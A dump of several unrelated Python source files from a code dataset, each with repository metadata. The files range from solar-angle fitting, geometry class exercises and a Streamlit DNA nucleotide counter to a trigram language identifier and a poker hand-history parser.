declination (delta), the hour angle (omega) , latitude (phi), tilt (beta) and azimuth (gamma). The declination and the
hour angle are treated as input parameters for all cases. Latitude, tilt and azimuth can be given as input parameters
or left as unknowns (`None`). In total, seven different combinations arise from having these three parameters
as an inputs or as a unknowns. The seven conditionals below correspond to those combinations. The output function `func`
is used as one of the inputs to run_curve_fit which in turn is used to fit the unknowns. The function other outputs is
the 'bounds' tuple containing the bounds for the variables. Bounds for latitude are -90 to 90. Bounds for tilt are 0 to
90. Bounds for azimuth are -180 to 180. It is noted that, theoretically, bounds for tilt are 0 to 180 (Duffie, John A.,
and William A. Beckman. Solar engineering of thermal processes. New York: Wiley, 1991.). However a value of tilt >90
would mean that that the surface has a downward-facing component, which is not the case of the current application.
"""
from pvsystemprofiler.utilities.angle_of_incidence_function import func_costheta
import numpy as np
def select_function(latitude=None, tilt=None, azimuth=None):
"""
:param latitude: (optional) latitude input value in Degrees.
:param tilt: (optional) Tilt input value in Degrees.
:param azimuth: (optional) Azimuth input value in Degrees.
:return: Customized function 'func' and 'bounds' tuple.
"""
if latitude is None and tilt is None and azimuth is None:
func = lambda x, phi, beta, gamma: func_costheta(x, phi, beta, gamma)
elif latitude is not None and tilt is None and azimuth is None:
func = lambda x, beta, gamma: func_costheta(
x, np.deg2rad(latitude), beta, gamma
)
elif latitude is None and tilt is not None and azimuth is None:
func = lambda x, phi, gamma: func_costheta(x, phi, np.deg2rad(tilt), gamma)
elif latitude is None and tilt is None and azimuth is not None:
func = lambda x, phi, beta: func_costheta(x, phi, beta, np.deg2rad(azimuth))
elif latitude is None and tilt is not None and azimuth is not None:
func = lambda x, phi: func_costheta(
x, phi, np.deg2rad(tilt), np.deg2rad(azimuth)
)
elif latitude is not None and tilt is None and azimuth is not None:
func = lambda x, beta: func_costheta(
x, np.deg2rad(latitude), beta, np.deg2rad(azimuth)
)
elif latitude is not None and tilt is not None and azimuth is None:
func = lambda x, gamma: func_costheta(
x, np.deg2rad(latitude), np.deg2rad(tilt), gamma
)
bounds_dict = {
"latitude": [-np.pi / 2, np.pi / 2],
"tilt": [0, np.pi / 2],
"azimuth": [-np.inf, np.inf],
}
bounds = []
if latitude is None:
bounds.append(bounds_dict["latitude"])
if tilt is None:
bounds.append(bounds_dict["tilt"])
if azimuth is None:
bounds.append(bounds_dict["azimuth"])
bounds = tuple(np.transpose(bounds).tolist())
return func, bounds
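# Minimal usage sketch (illustrative values): fit only the azimuth when latitude
# and tilt are already known.
#   func, bounds = select_function(latitude=37.4, tilt=20.0, azimuth=None)
#   # 'func(x, gamma)' and 'bounds' can then be handed to a curve-fitting routine
#   # such as scipy.optimize.curve_fit, where x carries the declination and hour
#   # angle inputs expected by func_costheta.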
| true
|
e50927a2d1fa52442e3abcff85c6df6e81ce3b36
|
Python
|
chasefrankenfeld/how_to_think_like_a_computer_scientist
|
/chapters14_to_16/ch16_classes_digging_deeper.py
|
UTF-8
| 5,382
| 3.84375
| 4
|
[] |
no_license
|
import sys
def test(did_pass):
""" Print the rests of the test """
linenum = sys._getframe(1).f_lineno # gets the callers line number
if did_pass:
msg = "Test at line {} is ok.".format(linenum)
else:
msg = "Test at line {} FAILED.".format(linenum)
print(msg)
class Point:
""" Point class represents and manipulates x, y coordinates. """
def __init__(self, x=0, y=0):
""" Create a new point at x, y. """
self.x = x
self.y = y
def __str__(self):
""" Converting the point to a string. """
return "({0}, {1})".format(self.x, self.y)
def __add__(self, other):
return Point(self.x + other.x, self.y + other.y)
def __mul__(self, other):
return self.x * other.x + self.y * other.y
def __rmul__(self, other):
return Point(other * self.x, other * self.y)
def halfway(self, target):
""" Return the halfway point between myself and the target"""
mx = (self.x + target.x) / 2
my = (self.y + target.y) / 2
return Point(mx, my)
def distance_from_origin(self):
""" Compute m distance from the origin. """
return ((self.x ** 2) + (self.y ** 2)) ** 0.5
def reflex_x(self):
""" Reflecting the point in the x-axis """
mx = self.x
my = self.y
return mx, -my
def slope_from_origin(self):
""" Returns the slop of the line joining the origin to the point """
return self.y / self.x
def straight_line_points(self, target):
""" Returns the values m and c from y = mx + c """
m = ((self.y - target.y) / (self.x - target.x))
c = self.y - m * self.x
return m, c
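    # Example (illustrative): Point(1, 2).straight_line_points(Point(3, 6))
    # returns (2.0, 0.0), i.e. the line y = 2x + 0 through the two points.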
class Rectangle:
""" A classes to manufacture rectangle objects """
def __init__(self, posn, w, h):
""" Initialise the rectange at posn, with width w, height h """
self.corner = posn
self.width = w
self.height = h
def __str__(self):
return "({0}, {1}, {2})".format(self.corner, self.width, self.height)
def grow(self, delta_width, delta_height):
""" Grow (or shrink) this object by the deltas """
self.width += delta_width
self.height += delta_height
def move(self, dx, dy):
""" Move the point by dx and dy """
self.corner.x += dx
self.corner.y += dy
def area(self):
""" Return the area of the rectangle """
return self.height * self.width
def perimeter(self):
""" Return the length of the perimeter """
return self.width * 2 + self.height * 2
def flip(self):
""" Swap the width and height lengths """
x = self.height
y = self.width
self.height = y
self.width = x
def contains(self, point):
""" Test if a point falls with in the rectangle """
outer_x = self.corner.x + self.width
outer_y = self.corner.y + self.height
return (self.corner.x <= point.x < outer_x and
self.corner.y <= point.y < outer_y)
def collision(self, other):
""" Test if another rectangle collides with the first rectangle. """
outer_x = self.corner.x + self.width
outer_y = self.corner.y + self.height
if (self.corner.x <= other.corner.x <= outer_x and
self.corner.y <= other.corner.y <= outer_y):
return True
if (self.corner.x <= other.corner.x + other.width <= outer_x and
self.corner.y <= other.corner.y + other.height <= outer_y):
return True
if (self.corner.x <= other.corner.x <= outer_x and
self.corner.y <= other.corner.y + other.height <= outer_y):
return True
if (self.corner.x <= other.corner.x + other.width <= outer_x and
self.corner.y <= other.corner.y <= outer_y):
return True
return False
def test_suite():
r = Rectangle(Point(0, 0), 10, 5)
test(r.area() == 50)
test(r.perimeter() == 30)
test(r.width == 10 and r.height == 5)
#r.flip()
#test(r.width == 5 and r.height == 10)
test(r.contains(Point(0, 0)))
test(r.contains(Point(3, 3)))
test(not r.contains(Point(3, 7)))
test(not r.contains(Point(3, 5)))
test(r.contains(Point(3, 4.99999)))
test(not r.contains(Point(-3, -3)))
# Testing if collision with the point of the Other Rectangle
test(r.collision(Rectangle(Point(0, 0), 10, 5)))
test(r.collision(Rectangle(Point(5, 0), 10, 5)))
test(r.collision(Rectangle(Point(10, 5), 10, 5)))
test(r.collision(Rectangle(Point(9, 4), 10, 5)))
test(not r.collision(Rectangle(Point(20, 5), 10, 5)))
# Testing if collision with the top right corner of Other Rectangle
test(not r.collision(Rectangle(Point(-11, 5), 10, 5)))
test(r.collision(Rectangle(Point(0, 0), 10, 5)))
test(not r.collision(Rectangle(Point(0, -6), 10, 5)))
test(r.collision(Rectangle(Point(-9, -4), 10, 5)))
# Testing if collision with the top left corner of Other Rectangle
test(r.collision(Rectangle(Point(10, -5), 10, 5)))
test(not r.collision(Rectangle(Point(10, -6), 10, 5)))
# Testing if collision with the bottom right corner of Other Rectangle
test(r.collision(Rectangle(Point(-10, 5), 10, 5)))
test(not r.collision(Rectangle(Point(-11, 0), 10, 5)))
test_suite()
| true
|
ccffe5aea5a33a432328474f402ac7f099d2a3ef
|
Python
|
harshareddy794/assignments
|
/Hacker_rank/find_a_string.py
|
UTF-8
| 222
| 3.21875
| 3
|
[] |
no_license
|
import string
count=0
if __name__ == '__main__':
string=input()
sub_string=input()
for i in range(0,len(string)):
if(string[i:i+len(sub_string)]==sub_string):
count=count+1
print(count)
| true
|
b9f35430c84c521dbdef7ac101fd47ec75696645
|
Python
|
yxtay/how-to-think-like-a-computer-scientist
|
/Files/files_ex5_mystery.py
|
UTF-8
| 404
| 3.421875
| 3
|
[] |
no_license
|
import turtle
def draw(t, values):
if len(values) == 2:
t.goto(int(values[0]), int(values[1]))
elif values[0] == "UP":
t.up()
elif values[0] == "DOWN":
t.down()
alex = turtle.Turtle()
wn = turtle.Screen()
infile = open("mystery.txt")
line = infile.readline()
while line:
values = line.split()
draw(alex, values)
line = infile.readline()
infile.close()
alex.hideturtle()
wn.exitonclick()
| true
|
109972125ac49438051f08e14145b929917d493c
|
Python
|
depchen/arithmetic
|
/剑指/23.py
|
UTF-8
| 1,671
| 3.71875
| 4
|
[] |
no_license
|
# Problem description
# Binary search tree: if its left subtree is not empty, all node values in the left subtree are smaller than the root's value;
# if its right subtree is not empty, all node values in the right subtree are larger than the root's value;
# and its left and right subtrees are themselves binary search trees.
# Given an integer array, determine whether it could be the post-order traversal of some binary search tree.
# Output Yes if it is, otherwise No. Assume no two numbers in the input array are equal.
# -*- coding:utf-8 -*-
class Solution:
def __init__(self):
self.flag=False
def VerifySquenceOfBST(self, sequence):
# write code here
if len(sequence) < 0:
return False
if self.flag and len(sequence) == 0:
return True
if not self.flag and len(sequence) == 0:
return False
if min(sequence)>sequence[-1] or max(sequence)<sequence[-1]:
return True
index=0
for i in range(len(sequence)-1):
if sequence[i] >=sequence[-1]:
break
index = i
for j in range(index+1,len(sequence)-1):
if sequence[j]<sequence[-1]:
return False
left=True
right=True
self.flag=True
if index>0:
a = sequence[:index+1]
left=self.VerifySquenceOfBST(sequence[:index+1])
if index<len(sequence)-1:
aa=sequence[index+1:len(sequence)-1]
right = self.VerifySquenceOfBST(sequence[index+1:len(sequence)-1])
return left&right
if __name__ == '__main__':
s=Solution()
a=[4,8,6,12,16,14,10]
aa=s.VerifySquenceOfBST(a)
print(aa)
| true
|
efabcf910a467838b3ec72e3f6ceb3d41f5f7103
|
Python
|
jadsonlucio/EA-iqoption
|
/robo/web_page.py
|
UTF-8
| 1,216
| 2.796875
| 3
|
[] |
no_license
|
import sys
from PyQt5.QtCore import QUrl
from PyQt5.QtWidgets import QApplication, QWidget, QPushButton,QGridLayout,QLineEdit
from PyQt5.QtWebEngineWidgets import QWebEngineView
class widget_principal(QWidget):
def __init__(self):
QWidget.__init__(self)
self.resize(250, 150)
self.move(300, 300)
self.setWindowTitle('Simple')
self.iniciar_componentes()
self.show()
def iniciar_componentes(self):
self.grid=QGridLayout()
self.text=QLineEdit()
self.web_widget=QWebEngineView()
self.botao_confirm=QPushButton(text="Carregar")
self.grid.addWidget(self.text,0,0)
self.grid.addWidget(self.botao_confirm, 0, 1)
self.grid.addWidget(self.web_widget,1,0)
self.botao_confirm.clicked.connect(self.carregar_url)
self.setGeometry(300, 300, 250, 150)
self.setWindowTitle('Absolute')
self.setLayout(self.grid)
def carregar_url(self):
url=self.text.text()
print(url)
self.web_widget.showFullScreen()
self.web_widget.load(QUrl(url))
if __name__ == '__main__':
app = QApplication(sys.argv)
widget=widget_principal()
app.exec_()
pass
| true
|
7002601cae82ca4b3cff90e71ab419f4d956af56
|
Python
|
JeeVeeVee/univ
|
/1steBachelor/Scriptingtalen/Examenvoorbereiding/Diana/DianaCryptoSystem.py
|
UTF-8
| 1,083
| 3.25
| 3
|
[] |
no_license
|
class Diana:
def __init__(self, bestand):
self.pad = ""
file = open(bestand, "r")
alfabet = "AZERTYUIOPQSDFGHJKJKKLMWXCVNB"
for line in file:
for char in line:
if char in alfabet:
self.pad += char
def index(self, string):
searchstring = ""
for char in string:
if char in "ABCDEFGHIJKMNOPQRSTUVWXYZ":
searchstring += char
assert self.pad.find(searchstring) >= 0, "ongeldige prefix"
return self.pad.find(searchstring) + len(searchstring)
def trigraph(self, a, b):
a = a.upper()
b = b.upper()
alfabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
waardeA = alfabet.find(a)
waardeB = alfabet.find(b)
return alfabet[(25 - waardeA - waardeB) % 26]
def codeer(self, woord, n = 10):
onePad = ""
i = 0
while woord[i] in "ABCDEFGHIJKLMNOPQRSTUVWXYZ ":
onePad += woord[i]
input = woord[len(onePad)]
diana = Diana('otp.txt')
print(diana.index('ABCDE FGHIJ'))
| true
|
f9bac025c77cd703ac47ea286e4f816feb1eafc1
|
Python
|
xlincw0w/Language-identifier-
|
/script.py
|
UTF-8
| 2,016
| 3.40625
| 3
|
[] |
no_license
|
from itertools import islice
import numpy as np
import string
lang = {}
def take(n, iterable):
return list(islice(iterable, n))
def getList(dict):
list = []
for key in dict.keys():
list.append(key)
return list
def get_trigrams_freqs(text):
len(text)
freqs = {}
first = [char.lower() for char in text if char not in (string.punctuation + ' ')]
first = ''.join(first)
for i in range(0, len(first) - 2):
key = first[i:i+3]
freqs[key] = 0
for tri in freqs:
occurence = 0
for j in range(0, len(first) - 2):
key = first[j:j+3]
if (tri == key):
occurence += 1
freq = float(occurence / ( len(first)/3 ) )
freqs[tri] = freq
freqs = {k: v for k, v in sorted(freqs.items(), key=lambda item: item[1], reverse=True)}
return take(15, freqs.items())
eng = "This May 26th Quantum League will be available on Steam! Do you like a good fight and healthy competition? Try out this 2v2 arena, king of the hill, three clone time rewind mechanic, barrels, and all type of game. Put your skills and tactics into overdrive and wishlist for Early Access now!"
fr = """Vous recherchez une histoire en français. Que ce soit pour un nouveau né ou de jeunes enfants, le moment de la lecture est souvent un moment privilégié entre parents et enfants. Quel plaisir pour une petite fille ou un petit garçon quand son papa ou sa maman lui lit une histoire.
Lire une histoire à un enfant avant de dormir contribue à un endormissement serein. Celà lui permet de s’évader dans un monde fabuleux ou a contrario d’aborder des sujets qui l’ont touché durant sa journée. Lui raconter une histoire chaque soir, c’est aussi prendre du temps pour son enfant. Ca peut être une nouvelle histoire ou une histoire qu’il connait déjà et qu’il aime beaucoup."""
lang['English'] = get_trigrams_freqs(eng)
lang['Francais'] = get_trigrams_freqs(fr)
print(lang['Francais'])
| true
|
a682a2db66c1390cfe4d5b5533a54378c1300ba8
|
Python
|
Crypto-Dimo/workbook_ex
|
/chapter_three/ex_80.py
|
UTF-8
| 313
| 4.0625
| 4
|
[] |
no_license
|
n = int(input('Enter a number that is >= 2: '))
factor = 2
active = True
if n < 2:
active = False
print('Invalid value.')
else:
print(f'The prime factors of {n} are:')
while factor <= n and active:
if n % factor == 0:
print(factor)
n = n // factor
else:
factor += 1
| true
|
ff69cf11f9c26fdd1fdfa5105de8b9145f35abba
|
Python
|
Eronite/pygamedemo
|
/niveau.py
|
UTF-8
| 3,516
| 3.1875
| 3
|
[] |
no_license
|
"""Classes du jeu de Labyrinthe Donkey Kong"""
import pygame
from pygame.locals import *
from constantes import *
from math import *
from affichage import *
class Niveau:
"""Classe permettant de créer un niveau"""
def __init__(self, fichier,fond):
self.fichier = fichier
self.structure = 0
self.fond = fond
def generer(self):
"""Méthode permettant de générer le niveau en fonction du fichier.
On crée une liste générale, contenant une liste par ligne à afficher"""
#On ouvre le fichier
with open(self.fichier, "r") as fichier:
structure_niveau = []
            # Iterate over the lines of the file
for ligne in fichier:
ligne_niveau = []
                # Iterate over the sprites (letters) contained in the file
for sprite in ligne:
                    # Ignore the trailing "\n" at the end of each line
if sprite != '\n':
                        # Add the sprite to the line's list
ligne_niveau.append(sprite)
                # Add the line to the level's list
structure_niveau.append(ligne_niveau)
        # Save this structure
self.structure = structure_niveau
def afficher(self, fenetre):
"""Méthode permettant d'afficher le niveau en fonction
de la liste de structure renvoyée par generer()"""
#Chargement des images (seule celle d'arrivée contient de la transparence)
mur = pygame.image.load(image_mur).convert()
depart = pygame.image.load(image_depart).convert()
arrivee = pygame.image.load(image_arrivee).convert_alpha()
        # Iterate over the level's list
num_ligne = 0
for ligne in self.structure:
            # Iterate over the line lists
num_case = 0
img_toblit = ''
for sprite in ligne:
if sprite == ';':
                    # Compute the real position in pixels
x = num_case * taille_sprite
y = num_ligne * taille_sprite
                    if img_toblit == 'm': # m = Mur (wall)
                        fenetre.blit(mur, (x,y))
                    elif img_toblit == 'd': # d = Départ (start)
                        fenetre.blit(depart, (x,y))
                    elif img_toblit == 'a': # a = Arrivée (finish)
fenetre.blit(arrivee, (x,y))
else:
img = pygame.image.load("images/"+img_toblit+".png")
fenetre.blit(img, (x,y))
img_toblit = ''
num_case += 1
else:
img_toblit = img_toblit + sprite
num_ligne += 1
def Rafraichir(self, fenetre, listejoueur, joueur):
Barre_de_vie(fenetre,joueur)
#Affichages aux nouvelles positions
fenetre.blit(self.fond, (0,0))
self.afficher(fenetre)
for joueur in listejoueur:
fenetre.blit(joueur.direction, (joueur.x, joueur.y)) #joueur.direction = l'image dans la bonne direction
pygame.display.flip()
def collision(self, abscisse, ordonne, joueur, listejoueur):
casex = floor(abscisse / taille_sprite) *taille_sprite
casey = floor(ordonne / taille_sprite) * taille_sprite
for cible in listejoueur:
if (casex == cible.x and casey == cible.y) and (joueur != listejoueur ):
cible.combat(joueur.attaque)
def evenemnt( self, joueur, event,listejoueur):
if event.type == KEYDOWN:
#Si l'utilisateur presse Echap ici, on revient seulement au menu
if event.key == K_ESCAPE:
continuer_jeu = 0
#Touches de déplacement
elif event.key == K_RIGHT:
joueur.deplacer('droite')
elif event.key == K_LEFT:
joueur.deplacer('gauche')
elif event.key == K_UP:
joueur.deplacer('haut')
elif event.key == K_DOWN:
joueur.deplacer('bas')
elif event.type == MOUSEBUTTONDOWN:
if event.button == 1:
#self.collision(event.pos[0],event.pos[1], joueur, listejoueur)
joueur.deposer(event.pos[0],event.pos[1] )
| true
|
0f79a5987184195177291aa8edf3ddb966eb89f8
|
Python
|
Zibsun/lesson1
|
/hello.py
|
UTF-8
| 33
| 2.75
| 3
|
[] |
no_license
|
name = "Асхат"
print (name)
| true
|
488fda17eb34fb04d475978138d05c94fbfe294f
|
Python
|
zqy0/spider
|
/spider_fun1.py
|
UTF-8
| 1,643
| 2.71875
| 3
|
[] |
no_license
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2018-04-03 15:03:09
# @Author : Your Name (you@example.org)
# @Link : http://example.org
# @Version : $Id$
from bs4 import BeautifulSoup
html = open('test1.html', 'r', encoding='utf-8')
def html_to_csv(html = html):
soup = BeautifulSoup(html, "lxml")
fangjian = soup.find(id='fangjian')
options = fangjian.find_all('option')
# Get the currently selected campus, building name, and floor
current_selected = soup.find_all('option',attrs={'selected':'selected'})
# drxiaoqu,drlouming,drlouceng
with open('I:\python\spider\dict_sheet\dict_1.csv', 'w', encoding='utf-8') as f:
f.write('xiaoqu_id,xiaoqu_info,louming_id,louming_info,louceng_id,louceng_info\n')
info_list = []
for i in current_selected[:3]:
value = i['value']
f.write(value+','+i.text.strip()+',')
info_list.append(value)
info_list.append(i.text.strip())
print(info_list)
with open('I:\python\spider\dict_sheet\dict.csv', 'w', encoding='utf-8') as f:
f.write('xiaoqu_id,xiaoqu_info,louming_id,louming_info,louceng_id,louceng_info,fangjian_value,fangjian_info\n')
for option in options:
value = option['value']
if value != '':
print(value + ',' + option.text.strip())
f.write(info_list[0]+','+info_list[1]+','+info_list[2]+','+info_list[3]+','+info_list[4]+','+
info_list[5]+','+value+','+option.text.strip()+'\n')
else:
print('---' + option.text.strip())
if __name__ == '__main__':
html_to_csv()
| true
|
fd047568dc16dbd8131fe4808a1e2e20fd0a7196
|
Python
|
MacHu-GWU/Dev-Exp-Share
|
/docs/source/02-SDE/01-Program-Language/02-Python-Root/10-Manipulate-PDF-in-Python/pikepdf/test.py
|
UTF-8
| 399
| 2.609375
| 3
|
[
"MIT"
] |
permissive
|
# -*- coding: utf-8 -*-
from pathlib import Path
from pikepdf import Pdf, PdfImage
dir_here = Path(__file__).absolute().parent
path_w2_pdf = dir_here.parent / "w2.pdf"
pdf = Pdf.open(f"{path_w2_pdf}")
for page_num, page in enumerate(pdf.pages, start=1):
# split page
dst = Pdf.new()
dst.pages.append(page)
path_dst = dir_here / f"page-{page_num}.pdf"
dst.save(f"{path_dst}")
| true
|
989a1cf8e8192ddc0a650197c089aa5543b9550a
|
Python
|
ssehuun/langStudy
|
/baekjoon/11654.py
|
UTF-8
| 87
| 2.71875
| 3
|
[] |
no_license
|
# https://www.acmicpc.net/problem/11654
# ASCII code
a = input()
print(ord(a))
| true
|
a72e0f000a7aeb985531d6a52d0622b4bdc0ce2a
|
Python
|
graysoncroom/PythonGraphingPlayground
|
/histogram.py
|
UTF-8
| 325
| 3.40625
| 3
|
[] |
no_license
|
#!/bin/python
import matplotlib.pyplot as plt
population_ages = [22, 55, 62, 45, 34, 77, 4, 8, 14, 80, 65, 54, 43, 48, 24, 18, 13, 67]
min_age = 0
max_age = 140
age_step_by = 20
bins = list(range(min_age, max_age + 1, age_step_by))  # 0, 20, ..., 140
plt.hist(population_ages, bins, histtype='bar', rwidth=0.8)
plt.xlabel('x')
plt.ylabel('y')
plt.show()
| true
|
1243cb2b933a375c46b182f71f77947cf9ce6355
|
Python
|
azeembootwala/DesignPatterns-Deep-learning
|
/Chapter 1 Neural Networks/multi_label_model_branching.py
|
UTF-8
| 808
| 3.046875
| 3
|
[] |
no_license
|
import numpy as np
from tensorflow.keras import Model, Input
from tensorflow.keras.layers import Dense
def model_branch():
# An example of how a model structure looks for a branched NN
input_shape = (3,)
inputs = Input(input_shape)
x = Dense(10, activation = 'relu')(inputs)
x = Dense(10, activation = 'relu')(x)
output1 = Dense(5, activation = 'softmax')(x)
output2 = Dense(2, activation = 'softmax')(x)
model = Model(inputs, [output1 , output2])
model.compile(loss = 'categorical_crossentropy' , optimizer = 'adam', metrics = ['accuracy'])
model.summary()
return model
def model_multi_label():
# An example of a model structure for multi-label classification
pass
def train():
model = model_branch()
if __name__ == '__main__':
train()
| true
|
3534cdbb5793414a88cbe20367836b8fa8198303
|
Python
|
krikui/Test_repo
|
/test.py
|
UTF-8
| 233
| 3.265625
| 3
|
[] |
no_license
|
#!/usr/bin/python
import sys
print('Number of arguments:', len(sys.argv), 'arguments')
type(sys.argv)
print(str(sys.argv))
print("Help\n")
raw_input("\n\nPress the enter key to exit.")
x = 'foo'; sys.stdout.write(x+'\n')
sys.exit(0)
| true
|
283ee6e0e1e6c4294f0080a98310693db0a813d5
|
Python
|
tzuhwan/dna-count
|
/myapp.py
|
UTF-8
| 2,067
| 3.5625
| 4
|
[] |
no_license
|
#############################
# Import libaries
#############################
import pandas as pd
import streamlit as st
import altair as alt
#############################
# Page Title
#############################
st.write("""
# DNA Nucleotide Count Web App
This app counts the nucleotide composition of query DNA
***
""")
#############################
# Input Text Box
#############################
st.header("Enter DNA sequence")
st.write(
"DNA sequences consist of four bases: adenine(A), guanine(G), cytosine(C), and thymine(T). So just generate a DNA sequence using those 4 letters, or use this [DNA Sequence Generator](http://www.faculty.ucr.edu/~mmaduro/random.htm)."
)
sequence_input = ">DNA Query\nGGGGGGGAACGCTGAAGATCTCTTCTTCTCATGACTGAACTCGCGAGGGTCGTGATGTCGGTTCCTTCAAAGGTTAAAGAACAAAGGCTTACTGTGCGCA"
sequence = st.text_area("Sequence input", sequence_input, height=250)
sequence = sequence.splitlines()
sequence = sequence[1:] # exclude the sequence name
sequence = "".join(sequence) # concatenate dna sequence all together
st.write("""
***
""")
st.header("INPUT (DNA Query)")
sequence
# DNA nucleotide count
def DNA_nucleotide_count(seq):
d = {
"A": seq.count('A'),
"T": seq.count('T'),
"C": seq.count('C'),
"G": seq.count('G')
}
return d
X = DNA_nucleotide_count(sequence)
X_label = list(X)
X_values = list(X.values())
nucleotide_dict = {
"A": "Adenine(A)",
"C": "Cytosine(C)",
"G": "Guanine(G)",
"T": "Thymine(T)"
}
# Display base counts in a df
df = pd.DataFrame.from_dict(X, orient='index')
df = df.rename({0: 'count'}, axis='columns')
df.reset_index(inplace=True)
df = df.rename(columns={"index": "nucleotide"})
# df["nucleotide"] = df.apply(lambda x: (nucleotide_dict[x["nucleotide"]]))
df = df.replace({"nucleotide": nucleotide_dict})
st.subheader("Bases Count")
st.dataframe(df)
# Display bar chart using Altair
st.subheader("Chart Display")
p = alt.Chart(df).mark_bar().encode(x="nucleotide", y="count")
p = p.properties(width=alt.Step(80))
st.write(p)
| true
|
abf1b636e3aee9ea123f69a4a1ff5c9f637b2280
|
Python
|
SamAndrew27/poker-capstone
|
/src/datacleaning/columns_from_hand_history.py
|
UTF-8
| 22,939
| 3.328125
| 3
|
[] |
no_license
|
import pandas as pd
def fill_HH_columns(df):
"""takes in dataframe and uses HandHistory column to create the below features
Args:
df (DataFrame): Dataframe created using SQL DriveHud backup
Returns:
DataFrame: same as dataframe input with additional columns
"""
df['buyin'] = df['HandHistory'].apply(lambda hh: buyin(hh))
df['cash_or_tourn'] = df['HandHistory'].apply(lambda hh: gametype(hh)) # to discern between cash & tournaments
    df['my_blind_anti_total'] = df['HandHistory'].apply(lambda hh: my_blind_anti_total(hh)) # how much I put in by default (blind/ante)
df['my_cards'] = df['HandHistory'].apply(lambda hh: hole_cards(hh)) # my cards
df['starting_stack'] = df['HandHistory'].apply(lambda hh: start_stack(hh))
df['tournament_type'] = df['HandHistory'].apply(lambda hh: tournament_type(hh))
df['won'] = df['HandHistory'].apply(lambda hh: won(hh))
df['bet'] = df['HandHistory'].apply(lambda hh: bet(hh))
df['total_players'] = df['HandHistory'].apply(lambda hh: total_players(hh))
df['position'] = df['HandHistory'].apply(lambda hh: position(hh))
df['table_max_players'] = df['HandHistory'].apply(lambda hh: table_max(hh))
# pretty sure this requires edits for edge case, refer to function below
df['bets_before_my_preflop_action'] = df.HandHistory.apply(lambda hh: bets_before_my_preflop_action(hh))
df['action_type'] = df['HandHistory'].apply(lambda hh: action_type(hh))
df['player_names'] = df['HandHistory'].apply(lambda hh: player_names(hh)) # for use by other functions
df['players_acting_before_me'] = df['HandHistory'].apply(lambda hh: players_before(hh)) # does not include players who folded
df['players_acting_after_me'] = df['HandHistory'].apply(lambda hh: players_after(hh)) # this might not account for cases where action was folded leading to some players never making an action. If we end up using data for hands where some players did not have to act we will have to develop a more robust function
df['limpers'] = df['HandHistory'].apply(lambda hh: limpers(hh))
df['raises&reraises'] = df['HandHistory'].apply(lambda hh: raises_and_reraises(hh))
df['callers'] = df['HandHistory'].apply(lambda hh: callers(hh))
return df
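# --- A minimal usage sketch (not part of the original module). It assumes the
# --- DataFrame comes from a DriveHud SQL backup and that 'HandHistory' holds the
# --- raw hand text, split here into a list of lines as the parsers below expect.
# --- The database path and table/column names are hypothetical.
#
#   import sqlite3
#   conn = sqlite3.connect("drivehud_backup.db")
#   df = pd.read_sql("SELECT * FROM hands", conn)
#   df['HandHistory'] = df['HandHistory'].str.splitlines()
#   df = fill_HH_columns(df)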
##############################################################################################
# functions that do these processes
def buyin(hh):
"""gets buy-in of the tournament, fairly certain cash games still have some sort of value here?
Args:
hh: 'HandHistory' column, string data of hands
Returns:
float: buy-in of tournament
"""
for elem in hh:
if 'totalbuyin' in elem:
temp = elem
temp = temp.replace('<totalbuyin>$', '')
temp = temp.replace('</totalbuyin>', '')
return float(temp)
def gametype(hh):
"""gets gametype of tournament - used to get 'cash_or_tourn', which may be a misleading name
Args:
hh: 'HandHistory' column, list string data of hand
Returns:
string: type of game
"""
temp = None
for elem in hh:
if 'gametype' in elem:
temp = elem.replace('<gametype>', '').replace('</gametype>', '').strip()
break
return temp
def hole_cards(hh):
"""finds the cards I hold, saves the 2 values in their present form to a list
Args:
hh: 'HandHistory' column, string data of hands
Returns:
list: 2 cards I held, Suit:Face Value format
"""
c1 = ''
c2 = ''
for elem in hh:
if 'Pocket' in elem and 'Hero' in elem: # looks for string where my cards are listed
temp = elem.split(' ') # split and iterate through that string
for s in temp:
if 'Hero' in s: # gets card 1
c1 = s.replace('player="Hero">', '')
c1 = c1.replace('0', '')
if '</cards>' in s: # gets card 2
c2 = s.replace('</cards>', '')
c2 = c2.replace('0', '')
if c1 != '':
cards = [c1, c2] # puts cards if list if they exist
return cards
else:
return None
def start_stack(hh):
"""Finds amount of chips I started hand with
Args:
hh: 'HandHistory' column, string data of hands
Returns:
float: number of chips
"""
result = None
temp = ''
for elem in hh:
if 'Hero' in elem and 'addon' in elem:
temp = elem
if temp != '':
temp = temp.split(' ')
for elem in temp:
if 'chips' in elem:
result = elem.replace('chips="', '')
result = result.replace('"', '')
result = float(result)
return result
def tournament_type(hh):
"""gets type of tournament
Args:
hh:'HandHistory' column, string data of hands
Returns:
string: tournament type
"""
result = ''
cut = 0
counter = 0
for elem in hh:
if '<tournamentname>' in elem: # doing some string wrangling below to get just the name of the tournament
temp = elem
cut = temp.count('(')
temp = temp.replace('<tournamentname>', '')
for char in temp:
if char != '(':
result += char
else:
counter += 1
if counter == cut:
break
else:
result += char
result = result.rstrip()
result = result.replace('amp;', '')
if 'Table3' in result:
result = 'Jackpot Sit & Go $0.50'
return result
def won(hh):
"""How much I won in the hand
Args:
hh:'HandHistory' column, string data of hands
Returns:
float: amount won
"""
won = ''
temp = ''
result = 0
for elem in hh:
if 'Hero' in elem and 'addon' in elem:
temp = elem
if temp != '':
temp = temp.split(' ')
for elem in temp:
if 'win' in elem:
won = elem.replace('win="', '')
won = won.replace('"', '')
result = float(won)
return result
def bet(hh):
"""finds amount I bet in the hand
Args:
hh: 'HandHistory' column, string data of hands
Returns:
float: amount bet
"""
bet = ''
temp = ''
result = None
for elem in hh:
if 'Hero' in elem and 'addon' in elem:
temp = elem
if temp != '':
temp = temp.split(' ')
for elem in temp:
if 'bet' in elem:
bet = elem.replace('bet="', '').replace('"', '')
result = float(bet)
return result
def total_players(hh):
"""finds number of total players at table
Args:
hh: 'HandHistory' column, string data of hands
Returns:
int: total number of players (2-9 should be possible values)
"""
count = 0
for elem in hh:
if 'Pocket' in elem:
count += 1
return count
def position(hh):
"""Finds where I was seated
Args:
hh: 'HandHistory' column, string data of hands
Returns:
        float: my position as a fraction of the table, i.e. seat number divided by total players
        (e.g. with three players, the earliest seat returns 1/3 ≈ 0.33 and the last seat returns 1.0)
"""
pos_lst = []
dealer_pos = 0
dealer_exists = False
hero_counter = 0
hero_found = False
result = None
hero_pos = 0
SB = ''
for elem in hh: # find all initial seatings
if 'dealer' in elem:
pos_lst.append(elem)
for idx, elem in enumerate(pos_lst):
if 'dealer="1"' in elem:
dealer_pos = idx
